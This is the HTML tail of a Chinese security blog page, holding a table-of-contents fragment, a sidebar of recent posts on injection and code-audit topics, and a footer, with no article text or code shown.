class="toc-number">5.3.</span> <span class="toc-text">Python代码</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-%E4%BF%AE%E5%A4%8D"><span class="toc-number">6.</span> <span class="toc-text">0x05 修复</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06-%E6%80%BB%E7%BB%93"><span class="toc-number">7.</span> <span class="toc-text">0x06 总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x07-%E5%B0%8Ftrips%EF%BC%9A"><span class="toc-number">8.</span> <span class="toc-text">0x07 小trips：</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Nosql inject注入"/></a><div class="content"><a class="title" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入">Nosql inject注入</a><time datetime="2022-11-28T07:28:02.000Z" title="发表于 2022-11-28 15:28:02">2022-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="企业 SDLC 安全生命周期管理"/></a><div class="content"><a class="title" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理">企业 SDLC 安全生命周期管理</a><time datetime="2022-11-15T14:03:44.000Z" title="发表于 2022-11-15 22:03:44">2022-11-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计漏洞(File Operation\Redirect\Cors)"/></a><div class="content"><a class="title" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)">Go 代码审计漏洞(File Operation\Redirect\Cors)</a><time datetime="2022-11-05T09:15:28.000Z" title="发表于 2022-11-05 17:15:28">2022-11-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计高危漏洞(sqli\cmd\ssrf)"/></a><div class="content"><a class="title" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)">Go 代码审计高危漏洞(sqli\cmd\ssrf)</a><time datetime="2022-10-30T06:57:14.000Z" title="发表于 2022-10-30 14:57:14">2022-10-30</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Java代码审计： ClassLoader应用"/></a><div class="content"><a class="title" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用">Java代码审计： ClassLoader应用</a><time datetime="2022-05-10T08:21:21.000Z" title="发表于 2022-05-10 16:21:21">2022-05-10</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2022 By Zeo</div><div class="footer_custom_text">Hi, welcome to my blog!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div></div></body></html>